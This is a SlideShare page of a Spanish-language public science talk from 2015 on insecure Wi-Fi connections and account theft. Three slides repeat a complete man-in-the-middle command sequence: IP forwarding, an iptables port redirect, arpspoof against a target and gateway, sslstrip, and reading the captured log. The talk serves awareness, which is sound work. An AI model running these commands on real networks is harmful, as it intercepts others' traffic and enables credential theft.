SlideShare una empresa de Scribd logo
1 de 11
Conexiones inseguras y robo de
cuentas
Ni Neu, 20 de mayo 2015
Julián Estévez
@jeibros
http://www.ideasecundaria.blogspot.com
• echo 1 > /proc/sys/net/ipv4/ip_forward
• iptables –t nat –A PREROUTING –p tcp --destination-
port 80 –j REDIRECT --to-port 8080
• arpspoof –i <interface> -t <target IP> -r <gateway IP>
• sslstrip –l 8080
• cat sslstrip.log
Código
Ataque MITM
• echo 1 > /proc/sys/net/ipv4/ip_forward
• iptables –t nat –A PREROUTING –p tcp --destination-
port 80 –j REDIRECT --to-port 8080
• arpspoof –i <interface> -t <target IP> -r <gateway IP>
• sslstrip –l 8080
• cat sslstrip.log
Código
• echo 1 > /proc/sys/net/ipv4/ip_forward
• iptables –t nat –A PREROUTING –p tcp --destination-
port 80 –j REDIRECT --to-port 8080
• arpspoof –i <interface> -t <target IP> -r <gateway IP>
• sslstrip –l 8080
• cat sslstrip.log
Código
Herramienta SSLSTRIP (2009)
Fing App (Android)
-El usuario cree que en red WPA está seguro
-HTTPS
Afortunadamente…
- Gmail y Facebook están protegidos frente a
SSLStrip
Pero…
- No están seguros frente a otros ataques
como SSLSplit, robo de cookie e ingeniería
social
No hace falta ser un genio
Kali Linux
Conexiones inseguras y robo de
cuentas
Ni Neu, 20 de mayo 2015
Julián Estévez
@jeibros
http://www.ideasecundaria.blogspot.com

Más contenido relacionado

Destacado (6)

Free UK UFO National Archives Documents
Free UK UFO National Archives DocumentsFree UK UFO National Archives Documents
Free UK UFO National Archives Documents
 
Produccion y comercializacion_de_porcinos
Produccion y comercializacion_de_porcinosProduccion y comercializacion_de_porcinos
Produccion y comercializacion_de_porcinos
 
AG Power
AG PowerAG Power
AG Power
 
WFA 2016 - Digital Resources to Improve your Marketing & your Life
WFA 2016 - Digital Resources to Improve your Marketing & your LifeWFA 2016 - Digital Resources to Improve your Marketing & your Life
WFA 2016 - Digital Resources to Improve your Marketing & your Life
 
Executive Resume
Executive ResumeExecutive Resume
Executive Resume
 
Remembering the Customer In Contact Center Customer Service
Remembering the Customer In Contact Center Customer ServiceRemembering the Customer In Contact Center Customer Service
Remembering the Customer In Contact Center Customer Service
 

Similar a Pint Of Science - Donostia - San Sebastian

Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
wcuestas
 
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
RootedCON
 
Multi relay
Multi relayMulti relay
Multi relay
jselvi
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
RootedCON
 
Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11
spankito
 

Similar a Pint Of Science - Donostia - San Sebastian (20)

Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
 
Hacking ético con herramientas Python
Hacking ético con herramientas PythonHacking ético con herramientas Python
Hacking ético con herramientas Python
 
Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detalladoSeguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detallado
 
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
 
7.herramientas de redes
7.herramientas de redes7.herramientas de redes
7.herramientas de redes
 
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
 
Hardware Hacking Rad
Hardware Hacking RadHardware Hacking Rad
Hardware Hacking Rad
 
Monitorización En OpenSolaris
Monitorización En OpenSolarisMonitorización En OpenSolaris
Monitorización En OpenSolaris
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
 
Multi relay
Multi relayMulti relay
Multi relay
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 
Seguridad en VoIP
Seguridad en VoIPSeguridad en VoIP
Seguridad en VoIP
 
Hardware Hacking con Arduino y RAD
Hardware Hacking con Arduino y RADHardware Hacking con Arduino y RAD
Hardware Hacking con Arduino y RAD
 
Uso del escaner de puertos nmap
Uso del escaner de puertos nmapUso del escaner de puertos nmap
Uso del escaner de puertos nmap
 
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingConferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical Hacking
 
Trust No One
Trust No OneTrust No One
Trust No One
 
Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11
 
Codemotion Madrid 2019 - ¡GraalVM y Micronaut: compañeros perfectos!
Codemotion Madrid 2019 - ¡GraalVM y Micronaut: compañeros perfectos!Codemotion Madrid 2019 - ¡GraalVM y Micronaut: compañeros perfectos!
Codemotion Madrid 2019 - ¡GraalVM y Micronaut: compañeros perfectos!
 
Firewall
FirewallFirewall
Firewall
 
Snortpracticas 2006
Snortpracticas 2006Snortpracticas 2006
Snortpracticas 2006
 

Último

Derivadas- sus aplicaciones en la vida cotidiana
Derivadas- sus aplicaciones en la vida cotidianaDerivadas- sus aplicaciones en la vida cotidiana
Derivadas- sus aplicaciones en la vida cotidiana
pabv24
 
Althusser, Louis. - Ideología y aparatos ideológicos de Estado [ocr] [2003].pdf
Althusser, Louis. - Ideología y aparatos ideológicos de Estado [ocr] [2003].pdfAlthusser, Louis. - Ideología y aparatos ideológicos de Estado [ocr] [2003].pdf
Althusser, Louis. - Ideología y aparatos ideológicos de Estado [ocr] [2003].pdf
frank0071
 
Hobson, John A. - Estudio del imperialismo [ocr] [1902] [1981].pdf
Hobson, John A. - Estudio del imperialismo [ocr] [1902] [1981].pdfHobson, John A. - Estudio del imperialismo [ocr] [1902] [1981].pdf
Hobson, John A. - Estudio del imperialismo [ocr] [1902] [1981].pdf
frank0071
 
El Genoma Humano, Características, Definición, ETC
El Genoma Humano, Características, Definición, ETCEl Genoma Humano, Características, Definición, ETC
El Genoma Humano, Características, Definición, ETC
J0S3G4LV1S
 
Morgado & Rodríguez (eds.) - Los animales en la historia y en la cultura [201...
Morgado & Rodríguez (eds.) - Los animales en la historia y en la cultura [201...Morgado & Rodríguez (eds.) - Los animales en la historia y en la cultura [201...
Morgado & Rodríguez (eds.) - Los animales en la historia y en la cultura [201...
frank0071
 

Último (20)

Derivadas- sus aplicaciones en la vida cotidiana
Derivadas- sus aplicaciones en la vida cotidianaDerivadas- sus aplicaciones en la vida cotidiana
Derivadas- sus aplicaciones en la vida cotidiana
 
COMBATE 02 DE MAYO O COMBATE DE CALLAO.docx
COMBATE 02 DE MAYO O COMBATE DE CALLAO.docxCOMBATE 02 DE MAYO O COMBATE DE CALLAO.docx
COMBATE 02 DE MAYO O COMBATE DE CALLAO.docx
 
Althusser, Louis. - Ideología y aparatos ideológicos de Estado [ocr] [2003].pdf
Althusser, Louis. - Ideología y aparatos ideológicos de Estado [ocr] [2003].pdfAlthusser, Louis. - Ideología y aparatos ideológicos de Estado [ocr] [2003].pdf
Althusser, Louis. - Ideología y aparatos ideológicos de Estado [ocr] [2003].pdf
 
LIPIDOS y ACIDOS NUCLEICOS Y TODOS SUS SILLARES ESTRUCTURALES
LIPIDOS y ACIDOS NUCLEICOS Y TODOS SUS SILLARES ESTRUCTURALESLIPIDOS y ACIDOS NUCLEICOS Y TODOS SUS SILLARES ESTRUCTURALES
LIPIDOS y ACIDOS NUCLEICOS Y TODOS SUS SILLARES ESTRUCTURALES
 
Mapa-conceptual-de-la-Seguridad-y-Salud-en-el-Trabajo-3.pptx
Mapa-conceptual-de-la-Seguridad-y-Salud-en-el-Trabajo-3.pptxMapa-conceptual-de-la-Seguridad-y-Salud-en-el-Trabajo-3.pptx
Mapa-conceptual-de-la-Seguridad-y-Salud-en-el-Trabajo-3.pptx
 
Glaeser, E. - El triunfo de las ciudades [2011].pdf
Glaeser, E. - El triunfo de las ciudades [2011].pdfGlaeser, E. - El triunfo de las ciudades [2011].pdf
Glaeser, E. - El triunfo de las ciudades [2011].pdf
 
Trichomonas es un género de parásitos protozoarios flagelados.
Trichomonas es un género de parásitos protozoarios flagelados.Trichomonas es un género de parásitos protozoarios flagelados.
Trichomonas es un género de parásitos protozoarios flagelados.
 
Hobson, John A. - Estudio del imperialismo [ocr] [1902] [1981].pdf
Hobson, John A. - Estudio del imperialismo [ocr] [1902] [1981].pdfHobson, John A. - Estudio del imperialismo [ocr] [1902] [1981].pdf
Hobson, John A. - Estudio del imperialismo [ocr] [1902] [1981].pdf
 
PRUEBA CALIFICADA 4º sec biomoleculas y bioelementos .docx
PRUEBA CALIFICADA 4º sec biomoleculas y bioelementos .docxPRUEBA CALIFICADA 4º sec biomoleculas y bioelementos .docx
PRUEBA CALIFICADA 4º sec biomoleculas y bioelementos .docx
 
El Genoma Humano, Características, Definición, ETC
El Genoma Humano, Características, Definición, ETCEl Genoma Humano, Características, Definición, ETC
El Genoma Humano, Características, Definición, ETC
 
Pelos y fibras. Criminalistica pelos y fibras
Pelos y fibras. Criminalistica pelos y fibrasPelos y fibras. Criminalistica pelos y fibras
Pelos y fibras. Criminalistica pelos y fibras
 
Morgado & Rodríguez (eds.) - Los animales en la historia y en la cultura [201...
Morgado & Rodríguez (eds.) - Los animales en la historia y en la cultura [201...Morgado & Rodríguez (eds.) - Los animales en la historia y en la cultura [201...
Morgado & Rodríguez (eds.) - Los animales en la historia y en la cultura [201...
 
Antequera, L. - Historia desconocida del descubrimiento de América [2021].pdf
Antequera, L. - Historia desconocida del descubrimiento de América [2021].pdfAntequera, L. - Historia desconocida del descubrimiento de América [2021].pdf
Antequera, L. - Historia desconocida del descubrimiento de América [2021].pdf
 
LOS PRIMEROS PSICÓLOGOS EXPERIMENTALES (1).pdf
LOS PRIMEROS PSICÓLOGOS EXPERIMENTALES (1).pdfLOS PRIMEROS PSICÓLOGOS EXPERIMENTALES (1).pdf
LOS PRIMEROS PSICÓLOGOS EXPERIMENTALES (1).pdf
 
Moda colonial de 1810 donde podemos ver las distintas prendas
Moda colonial de 1810 donde podemos ver las distintas prendasModa colonial de 1810 donde podemos ver las distintas prendas
Moda colonial de 1810 donde podemos ver las distintas prendas
 
1890 –7 de junio - Henry Marmaduke Harris obtuvo una patente británica (Nº 88...
1890 –7 de junio - Henry Marmaduke Harris obtuvo una patente británica (Nº 88...1890 –7 de junio - Henry Marmaduke Harris obtuvo una patente británica (Nº 88...
1890 –7 de junio - Henry Marmaduke Harris obtuvo una patente británica (Nº 88...
 
El Gran Atractor, la misteriosa fuerza que está halando a la Vía Láctea.pptx
El Gran Atractor, la misteriosa fuerza que está halando a la Vía Láctea.pptxEl Gran Atractor, la misteriosa fuerza que está halando a la Vía Láctea.pptx
El Gran Atractor, la misteriosa fuerza que está halando a la Vía Láctea.pptx
 
Mapa Conceptual Modelos de Comunicación .pdf
Mapa Conceptual Modelos de Comunicación .pdfMapa Conceptual Modelos de Comunicación .pdf
Mapa Conceptual Modelos de Comunicación .pdf
 
CUADRO SINOPTICO IV PARCIAL/ TORAX . PDF
CUADRO SINOPTICO IV PARCIAL/ TORAX . PDFCUADRO SINOPTICO IV PARCIAL/ TORAX . PDF
CUADRO SINOPTICO IV PARCIAL/ TORAX . PDF
 
Musculos Paraproteticos, protesis, musculos
Musculos Paraproteticos, protesis, musculosMusculos Paraproteticos, protesis, musculos
Musculos Paraproteticos, protesis, musculos
 

Pint Of Science - Donostia - San Sebastian

  • 1. Conexiones inseguras y robo de cuentas Ni Neu, 20 de mayo 2015 Julián Estévez @jeibros http://www.ideasecundaria.blogspot.com
  • 2. • echo 1 > /proc/sys/net/ipv4/ip_forward • iptables –t nat –A PREROUTING –p tcp --destination- port 80 –j REDIRECT --to-port 8080 • arpspoof –i <interface> -t <target IP> -r <gateway IP> • sslstrip –l 8080 • cat sslstrip.log Código
  • 4. • echo 1 > /proc/sys/net/ipv4/ip_forward • iptables –t nat –A PREROUTING –p tcp --destination- port 80 –j REDIRECT --to-port 8080 • arpspoof –i <interface> -t <target IP> -r <gateway IP> • sslstrip –l 8080 • cat sslstrip.log Código
  • 5.
  • 6. • echo 1 > /proc/sys/net/ipv4/ip_forward • iptables –t nat –A PREROUTING –p tcp --destination- port 80 –j REDIRECT --to-port 8080 • arpspoof –i <interface> -t <target IP> -r <gateway IP> • sslstrip –l 8080 • cat sslstrip.log Código
  • 9. -El usuario cree que en red WPA está seguro -HTTPS Afortunadamente… - Gmail y Facebook están protegidos frente a SSLStrip Pero… - No están seguros frente a otros ataques como SSLSplit, robo de cookie e ingeniería social
  • 10. No hace falta ser un genio Kali Linux
  • 11. Conexiones inseguras y robo de cuentas Ni Neu, 20 de mayo 2015 Julián Estévez @jeibros http://www.ideasecundaria.blogspot.com